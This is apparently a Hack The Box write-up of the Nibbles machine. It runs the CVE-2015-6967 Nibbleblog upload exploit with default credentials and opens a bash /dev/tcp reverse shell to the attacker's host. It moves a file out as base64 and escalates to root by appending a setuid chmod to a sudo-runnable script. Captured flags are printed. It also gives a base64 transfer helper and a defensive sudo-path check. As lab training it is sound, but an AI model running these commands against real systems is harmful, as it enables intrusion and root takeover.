Nibbles-htb-writeup

0x00 Skills covered by this box

Skills in this chapter: reading web page source, gathering default credentials, CVE-2015-6967, transferring a remote file as base64, using LinEnum.sh, extracting with unzip, appending a command to a bash script with echo

Reference links: none

0x01 Getting user

1. Start the target machine and note its IP address: 10.10.10.75

2. For the port scan I follow the method of the Bilibili uploader 红笔, which speeds the scan up: a fast full-range TCP sweep first, then UDP, then service/OS detection and the vuln scripts only against the open ports.

┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap -min-rate 10000 -p- 10.10.10.75
[sudo] password for kali:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-04 15:21 CST
Nmap scan report for 10.10.10.75
Host is up (0.30s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http

Nmap done: 1 IP address (1 host up) scanned in 10.05 seconds

┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap -min-rate 10000 -p- -sU 10.10.10.75
[sudo] password for kali:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-04 15:22 CST
Warning: 10.10.10.75 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.75
Host is up (0.30s latency).
All 65535 scanned ports on 10.10.10.75 are in ignored states.
Not shown: 65457 open|filtered udp ports (no-response), 78 closed udp ports (port-unreach)

Nmap done: 1 IP address (1 host up) scanned in 75.33 seconds

┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap -sT -sV -O -p22,80 10.10.10.75
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-04 15:25 CST
Nmap scan report for 10.10.10.75
Host is up (0.29s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.12 (96%), Linux 3.13 (96%), Linux 3.2 - 4.9 (96%), Linux 4.8 (96%), Linux 4.4 (95%), Linux 4.9 (95%), Linux 3.16 (95%), Linux 3.18 (95%), Linux 3.8 - 3.11 (95%), Linux 4.2 (95%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.03 seconds

┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap --script=vuln -p22,80 10.10.10.75
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-04 15:25 CST
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_ http://ha.ckers.org/slowloris/
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.

Nmap done: 1 IP address (1 host up) scanned in 347.37 seconds

3. This takes up a fair amount of space, but with the OSCP in mind I will stick with this approach.

4. The nmap scan turned up nothing particularly useful (the slowloris finding is a generic DoS check, not a way in), so let's look at what is being served on port 80.

5. The home page shows nothing, so view its source:

<!-- /nibbleblog/ directory. Nothing interesting here! -->

6. A directory path is leaked in an HTML comment; let's try visiting it.

7. It looks like a blog. Nothing stands out on its home page, so run a directory scan first:

┌──(kali㉿kali)-[~]
└─$ dirsearch -u http://10.10.10.75/nibbleblog/

_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /home/kali/.dirsearch/reports/10.10.10.75/-nibbleblog-_23-12-04_15-58-43.txt

Error Log: /home/kali/.dirsearch/logs/errors-23-12-04_15-58-43.log

Target: http://10.10.10.75/nibbleblog/

[15:58:44] Starting:

[15:59:08] 200 - 1KB - /nibbleblog/COPYRIGHT.txt
[15:59:11] 200 - 5KB - /nibbleblog/README
[15:59:13] 200 - 34KB - /nibbleblog/LICENSE.txt
[15:59:20] 301 - 321B - /nibbleblog/admin -> http://10.10.10.75/nibbleblog/admin/
[15:59:21] 200 - 2KB - /nibbleblog/admin/
[15:59:21] 200 - 1KB - /nibbleblog/admin.php
[15:59:21] 403 - 312B - /nibbleblog/admin/.htaccess
[15:59:21] 200 - 2KB - /nibbleblog/admin/?/login
[15:59:22] 301 - 332B - /nibbleblog/admin/js/tinymce -> http://10.10.10.75/nibbleblog/admin/js/tinymce/
[15:59:22] 200 - 2KB - /nibbleblog/admin/js/tinymce/
[15:59:47] 200 - 1KB - /nibbleblog/content/
[15:59:48] 301 - 323B - /nibbleblog/content -> http://10.10.10.75/nibbleblog/content/
[16:00:02] 200 - 3KB - /nibbleblog/index.php
[16:00:02] 200 - 3KB - /nibbleblog/index.php/login/
[16:00:02] 200 - 78B - /nibbleblog/install.php
[16:00:04] 301 - 325B - /nibbleblog/languages -> http://10.10.10.75/nibbleblog/languages/
[16:00:20] 301 - 323B - /nibbleblog/plugins -> http://10.10.10.75/nibbleblog/plugins/
[16:00:20] 200 - 4KB - /nibbleblog/plugins/
[16:00:34] 301 - 322B - /nibbleblog/themes -> http://10.10.10.75/nibbleblog/themes/
[16:00:34] 200 - 2KB - /nibbleblog/themes/
[16:00:36] 200 - 2KB - /nibbleblog/update.php

Task Completed

8. The scan found a README file; let's read it:

http://10.10.10.75/nibbleblog/README

====== Nibbleblog ======
Version: v4.0.3
Codename: Coffee
Release date: 2014-04-01

Site: http://www.nibbleblog.com
Blog: http://blog.nibbleblog.com
Help & Support: http://forum.nibbleblog.com
Documentation: http://docs.nibbleblog.com

===== Social =====
* Twitter: http://twitter.com/nibbleblog
* Facebook: http://www.facebook.com/nibbleblog
* Google+: http://google.com/+nibbleblog

===== System Requirements =====
* PHP v5.2 or higher
* PHP module - DOM
* PHP module - SimpleXML
* PHP module - GD
* Directory “content” writable by Apache/PHP

Optionals requirements

* PHP module - Mcrypt

===== Installation guide =====
1- Download the last version from http://nibbleblog.com
2- Unzip the downloaded file
3- Upload all files to your hosting or local server via FTP, Shell, Cpanel, others.
4- With your browser, go to the URL of your web. Example: www.domain-name.com
5- Complete the form
6- Done! you have installed Nibbleblog

===== About the author =====
Name: Diego Najar
E-mail: dignajar@gmail.com
Linkedin: http://www.linkedin.com/in/dignajar

===== Example Post =====
<h1>Lorem ipsum dolor sit amet</h1>
<p>ea tibique disputando qui. Utroque laboramus percipitur sea id, no oporteat constituto mea? Dico iracundia mnesarchum cum an, cu vidit albucius prodesset his. Facer primis essent ut quo, ea vivendo legendos assueverit vel, ne sed nonumes percipitur? No usu agam volutpat!</p>
<h2>An mutat docendi quo</h2>
<p>nusquam apeirian constituam ius cu? Et mel eripuit noluisse scriptorem, habeo dissentiet te qui, at veniam impedit deterruisset eam. Ne mollis aliquam sea, te vis tation inimicus ullamcorper, cum illum invenire id? Nam causae euripidis necessitatibus ex. Case ferri graece at vix. Usu platonem mediocritatem id, ullum salutatus at sed.</p>
<ol>
<li><strong>Graecis explicari vim cu</strong>. Vim simul tibique in, bonorum officiis maluisset eam an? Ut senserit argumentum pri, mei ut unum tollit labores. Mea tation nusquam detracto et. Ius quis disputationi an!</li>
<li><strong>Cu ignota inermis pri</strong>. Percipit sadipscing eu has. Ipsum laoreet suscipiantur nam in, ius probo rebum explicari cu. Doming aliquam tractatos usu in, sea tation feugiat adversarium te, at modus virtute antiopam per. Sit at ipsum atqui viderer, te vim dolores volutpat constituam.</li>
</ol>
<p>Eum malorum appellantur in, qui ad contentiones consequuntur interpretaris. Cu aeque gloriatur scriptorem vim! Fugit admodum sed ne? Natum scripta intellegebat sit ut, aeque forensibus ei eam. Mazim delicata ius id, usu at idque delicata perpetua. Mollis vidisse reprimique te has, oblique graecis voluptaria vis in. Sed ea aliquam indoctum, duo at hinc mucius, ex iudicabit consulatu mel.</p>
<p>Eu nisl debet convenire nam, et epicurei periculis democritum est, nam eu stet elitr oratio. Eam iriure virtute equidem in, ei summo officiis dignissim nec! Et nam soleat fuisset, doming fastidii voluptatum ea ius, errem volutpat cum eu! Ex detracto assueverit cum. An eos graeco utamur, veri audire his no. Possit dissentias ei mei, quidam efficiantur delicatissimi est id, vel iuvaret adipisci mnesarchum id.</p>
<pre>git clone [git-repo-url] nibbleblog<br />cd nibbleblog<br />npm i -d<br />mkdir -p public/files/{md,html,pdf}</pre>
<p>An mutat docendi quo, nusquam apeirian constituam ius cu? Et mel eripuit noluisse scriptorem, habeo dissentiet te qui, at veniam impedit deterruisset eam. Ne mollis aliquam sea, te vis tation inimicus ullamcorper, cum illum invenire id? Nam causae euripidis necessitatibus ex. Case ferri graece at vix. Usu platonem mediocritatem id, ullum salutatus at sed.</p>
<p>Graecis explicari vim cu. Vim simul tibique in, bonorum officiis maluisset eam an? Ut senserit argumentum pri, mei ut unum tollit labores. Mea tation nusquam detracto et. Ius quis disputationi an!</p>
<pre><code data-language="php">&lt;?php
echo "Hello Nibbleblog";
$tmp = array(1,2,3);
foreach($tmp as $number)
echo $number;
?&gt;</code></pre>
<h2>How to install Git</h2>
<p>An mutat docendi quo, nusquam apeirian constituam ius cu? Et mel eripuit noluisse scriptorem, habeo dissentiet te qui, at veniam impedit deterruisset eam. Ne mollis aliquam sea, te vis tation inimicus ullamcorper, cum illum invenire id? Nam causae euripidis necessitatibus ex. Case ferri graece at vix. Usu platonem mediocritatem id, ullum salutatus at sed.</p>
<pre class="nb-console">sudo yum install git</pre>
<p>An mutat docendi quo, nusquam apeirian constituam ius cu? Et mel eripuit noluisse scriptorem, habeo dissentiet te qui, at veniam impedit deterruisset eam. Ne mollis aliquam sea, te vis tation inimicus ullamcorper.</p>

9. We now have two important facts: the CMS is Nibbleblog and the version is v4.0.3.

10. The directory scan also gives us the following:

http://10.10.10.75/nibbleblog/update.php
Visiting it resets the database to its defaults.

http://10.10.10.75/nibbleblog/content/private/config.xml
Yields two pieces of information: admin@nibbles.com and noreply@10.10.10.134. The file is reachable at all because the content/ directory is browsable (it returned 200 in the dirsearch run above), so the blog's private files are exposed to unauthenticated visitors.

11. Searching for the keywords nibbleblog 4.0.3 exploit github turns up a file-upload vulnerability affecting this version.

12. A quick look shows it is an arbitrary file upload vulnerability, with one precondition: you need valid credentials first, since the upload goes through the authenticated admin panel.

https://github.com/dix0nym/CVE-2015-6967

13. The exploit ships with a default username and password; let's try those first and see whether they work:

--username admin --password nibbles

14. The admin login succeeds, so let's run the exploit:

┌──(kali㉿kali)-[~/桌面/CVE-2015-6967-main]
└─$ python3 exploit.py --url http://10.10.10.75/nibbleblog/ --username admin --password nibbles --payload qsd-php-backdoor.php
[+] Login Successful.
[+] Upload likely successfull.
[+] Exploit launched, check for shell.

15. The exploit source also hard-codes the path of the uploaded shell, so we can request the uploaded shell directly and use it to spawn a reverse shell:

def execute_shell(session, nibbleURL):
    # The My Image plugin stores the upload under a fixed name, so the
    # uploaded PHP file is always reachable at this path
    exploitURL = f"{nibbleURL}content/private/plugins/my_image/image.php"
    exploitResp = session.get(exploitURL)

    if exploitResp.status_code == 200:
        print('[+] Exploit launched, check for shell.')
    else:
        print('[!] Exploit failed.')

16. The reverse shell connects back, and with that we have user.txt:

┌──(kali㉿kali)-[~]
└─$ nc -lvnp 10086
listening on [any] 10086 ...

http://10.10.10.75/nibbleblog//content/private/plugins/my_image/image.php
bash -c "bash -i >& /dev/tcp/10.10.14.7/10086 0>&1"

┌──(kali㉿kali)-[~]
└─$ nc -lvnp 10086
listening on [any] 10086 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.10.75] 54960
bash: cannot set terminal process group (1354): Inappropriate ioctl for device
bash: no job control in this shell
nibbler@Nibbles:/var/www/html/nibbleblog/content/private/plugins/my_image$

nibbler@Nibbles:/var/www/html/nibbleblog/content/private/plugins/my_image$ cd ~
<ml/nibbleblog/content/private/plugins/my_image$ cd~
nibbler@Nibbles:/home/nibbler$ ls
ls
personal.zip
user.txt
nibbler@Nibbles:/home/nibbler$ cat user.txt
cat user.txt
d92d4dcd89654ab9fd78eadbbcda01c5
nibbler@Nibbles:/home/nibbler$

0x02 Getting root

17. In the steps above we noticed a zip archive in the home directory; let's pull it down and take a look:

nibbler@Nibbles:/home/nibbler$ md5sum personal.zip
md5sum personal.zip
dbc3f2c0351447fade589289d60335ae personal.zip
nibbler@Nibbles:/home/nibbler$ cat personal.zip | base64 -w 0;echo
cat personal.zip | base64 -w 0;echo
UEsDBAoAAAA******************wEAACYGAAAAAA==
nibbler@Nibbles:/home/nibbler$

┌──(kali㉿kali)-[~/桌面]
└─$ >....
e27432 ********* GAAAAAA== | base64 -d > personal.zip

┌──(kali㉿kali)-[~/桌面]
└─$ md5sum personal.zip
dbc3f2c0351447fade589289d60335ae personal.zip

18. This method is one I picked up on other HTB boxes; it is normally used for pulling out small files such as id_rsa. The md5sum on both ends confirms the copy arrived intact. Unzip it and see what is inside:

Tecmint_monitor.sh 
Written for Tecmint.com for the post www.tecmint.com/linux-server-health-monitoring-script

19. Overall it is a small server-monitoring script.
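The base64 transfer from step 17, wrapped as a pair of shell functions with the md5 comparison the author did by hand built in. This is an added example, not code from the original writeup; the file names in it are placeholders for whatever you are moving (personal.zip on this box).

```shell
#!/bin/sh
# Added example, not code from the original writeup: the base64 file
# transfer from step 17 as two functions with the digest check built in.

# Target side (run in the reverse shell): print "<md5>:<base64>" as one
# line. -w 0 disables wrapping so the blob is a single copy/paste unit and
# cannot be split by the shell's line handling.
b64_pack() {
    f="$1"
    sum=$(md5sum "$f" | cut -d' ' -f1)
    printf '%s:%s\n' "$sum" "$(base64 -w 0 "$f")"
}

# Attacker side (run on Kali): read one "<md5>:<base64>" line from stdin,
# decode it to "$1" and verify the digest. A clipped blob, a stray prompt
# character or a bad base64 character makes base64 -d fail or the digest
# differ; either way the partial output is removed and 1 is returned.
b64_unpack() {
    out="$1"
    IFS= read -r line || return 1
    expected=${line%%:*}
    blob=${line#*:}
    if ! printf '%s' "$blob" | base64 -d > "$out" 2>/dev/null; then
        rm -f "$out"
        return 1
    fi
    actual=$(md5sum "$out" | cut -d' ' -f1)
    if [ "$actual" != "$expected" ]; then
        rm -f "$out"
        return 1
    fi
    return 0
}
```

Usage: on the target run `b64_pack personal.zip`, copy the single printed line, and on Kali paste it into `b64_unpack personal.zip`. Because the digest travels with the blob, a truncated paste is rejected instead of silently producing a corrupt archive.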

20. Since I did not log in to this account over ssh and I don't know its password, running sudo -l directly would prompt me for a password, so I will just use LinEnum.sh to enumerate everything:

┌──(kali㉿kali)-[~/桌面/test]
└─$ python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...


nibbler@Nibbles:/tmp$ wget http://10.10.14.7:8000/LinEnum.sh
wget http://10.10.14.7:8000/LinEnum.sh
--2023-12-04 04:12:05-- http://10.10.14.7:8000/LinEnum.sh
Connecting to 10.10.14.7:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 46631 (46K) [text/x-sh]
Saving to: 'LinEnum.sh'

LinEnum.sh 0%[ ] 0 --.-KB/s LinEnum.sh 43%[=======> ] 19.67K 60.3KB/s LinEnum.sh 91%[=================> ] 41.50K 68.0KB/s LinEnum.sh 100%[===================>] 45.54K 74.6KB/s in 0.6s

2023-12-04 04:12:06 (74.6 KB/s) - 'LinEnum.sh' saved [46631/46631]

nibbler@Nibbles:/tmp$

The relevant finding in the LinEnum output is this path, which nibbler is allowed to run through sudo:

/home/nibbler/personal/stuff/monitor.sh

22. At this point it is already clear how to escalate: put the zip archive from earlier together with this path, and it is simply unzip and run (during the actual attempt I blanked for a while and didn't see it right away, even though it is this direct!).

23. Now that we know the method, let's escalate:

nibbler@Nibbles:/home/nibbler$ ls
ls
personal.zip user.txt
nibbler@Nibbles:/home/nibbler$ unzip personal.zip
unzip personal.zip
Archive: personal.zip
creating: personal/
creating: personal/stuff/
inflating: personal/stuff/monitor.sh
nibbler@Nibbles:/home/nibbler$
nibbler@Nibbles:/home/nibbler$ cd /personal/stuff
cd /personal/stuff
nibbler@Nibbles:/home/nibbler/personal/stuff$ echo "chmod u+s /bin/bash" >> monitor.sh
<er/personal/stuff$ echo "chmod u+s /bin/bash" >> mnitor.sh
nibbler@Nibbles:/home/nibbler/personal/stuff$ cat monitor.sh
cat monitor.sh
...........................
# Remove Temporary Files
rm /tmp/osrelease /tmp/who /tmp/ramcache /tmp/diskusage
}
fi
shift $(($OPTIND -1))
chmod u+s /bin/bash
nibbler@Nibbles:/home/nibbler/personal/stuff$ sudo ./monitor.sh
sudo ./monitor.sh
'unknown': I need something more specific.
/home/nibbler/personal/stuff/monitor.sh: 26: /home/nibbler/personal/stuff/monitor.sh: [[: not found
/home/nibbler/personal/stuff/monitor.sh: 36: /home/nibbler/personal/stuff/monitor.sh: [[: not found
/home/nibbler/personal/stuff/monitor.sh: 43: /home/nibbler/personal/stuff/monitor.sh: [[: not found
nibbler@Nibbles:/home/nibbler/personal/stuff$ ls -la /bin/bash
ls -la /bin/bash
-rwsr-xr-x 1 root root 1037528 May 16 2017 /bin/bash
nibbler@Nibbles:/home/nibbler/personal/stuff$ /bin/bash -p
/bin/bash -p
bash-4.3# id
id
uid=1001(nibbler) gid=1001(nibbler) euid=0(root) groups=1001(nibbler)
bash-4.3# ca /root/root.txt
ca /root/root.txt
bash: ca: command not found
bash-4.3# cat /root/root.txt
cat /root/root.txt
b19cb54ad99daab54d7efade799476f9
bash-4.3#
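The root cause of the escalation above is not what monitor.sh contains but where it lives: sudo lets nibbler run /home/nibbler/personal/stuff/monitor.sh as root while nibbler owns /home/nibbler, so nibbler can create or replace the script (or any directory on the way to it). Any sudo rule whose target sits under a path the user controls is root-equivalent. The check below is an added example, not code from the original writeup or from the box; the function name sudo_target_risk and the constructed paths in its usage are my own, and it relies on GNU stat.

```shell
#!/bin/sh
# Added example, not code from the original writeup or the Nibbles box.
# sudo_target_risk PATH USER walks from PATH up to / and prints the first
# component USER can modify: owned by USER, or group- or world-writable
# (group membership is not resolved, so a group-writable directory is
# reported for review). Returns 0 with the component on stdout when there
# is a finding, 1 and no output when every component is root-controlled.
# A PATH that does not exist yet is handled by starting at its deepest
# existing parent: that parent's permissions decide who gets to create it,
# which is the case where the sudo rule outlives the script.
sudo_target_risk() {
    p="$1"; u="$2"
    while [ ! -e "$p" ]; do
        p=$(dirname "$p")
    done
    while :; do
        owner=$(stat -L -c '%U' "$p")
        mode=$(stat -L -c '%a' "$p")
        mode=${mode#"${mode%???}"}   # keep the last three octal digits (drop suid/sgid/sticky)
        g=${mode#?}; g=${g%?}         # group permission digit
        w=${mode#??}                  # other permission digit
        if [ "$owner" = "$u" ] || [ $((g & 2)) -ne 0 ] || [ $((w & 2)) -ne 0 ]; then
            printf '%s\n' "$p"
            return 0
        fi
        [ "$p" = "/" ] && return 1
        p=$(dirname "$p")
    done
}
```

Run it as `sudo_target_risk /home/nibbler/personal/stuff/monitor.sh nibbler` on the box and it reports the script itself (or, once the script is deleted, /home/nibbler/personal/stuff, and with the whole tree gone, /home/nibbler). The fix is a rule that points at a root-owned script in a root-owned directory, such as /usr/local/sbin, with the script not writable by anyone but root; then the same check returns nothing.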

0x03 Completion proof

https://www.hackthebox.com/achievement/machine/1705469/121


Nibbles-htb-writeup
https://sh1yan.top/2023/12/04/Nibbles-htb-writeup/
Author: shiyan
Published: 4 December 2023
License: